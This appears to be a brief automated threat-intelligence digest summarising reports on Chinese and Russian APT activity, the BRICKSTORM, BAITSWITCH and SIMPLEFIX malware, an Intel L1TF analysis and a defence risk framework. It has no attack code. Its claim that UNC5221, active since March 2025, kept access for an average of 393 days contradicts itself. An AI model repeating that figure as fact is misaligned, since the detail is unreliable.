This briefing covers security developments from 0400 to 0600 UTC on Wednesday, September 25th, 2025, based on five articles from our threat intelligence feeds.
Threat Intelligence.
Attribution challenges continue to complicate our understanding of Chinese state-sponsored operations, with new analysis revealing overlapping relationships between Salt Typhoon and multiple APT groups including OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor. Three Chinese companies have been identified as suppliers of products and services to these interconnected threat clusters.
Russian APT group COLDRIVER has expanded their tactics beyond traditional credential phishing, now deploying ClickFix campaigns with two new malware families called BAITSWITCH downloader and SIMPLEFIX PowerShell backdoor. The group continues targeting Russian civil society members, NGOs, think tanks, and human rights defenders.
A China-nexus threat cluster designated UNC5221 has been conducting sophisticated espionage campaigns since March 2025 using BRICKSTORM malware. These actors are targeting legal services, SaaS providers, and technology companies in the United States, maintaining persistent access for an average of 393 days while exploiting zero-day vulnerabilities in network appliances.
Vulnerabilities.
Google's Project Rain has published a detailed technical overview of the L1TF vulnerability affecting Intel Skylake and older CPU architectures. This CPU vulnerability represents a continued concern for organizations running legacy Intel hardware in their infrastructure environments.
Tools.
The Department of War has announced a new cybersecurity risk management construct, though specific details about this framework remain unavailable due to access restrictions on their official communications.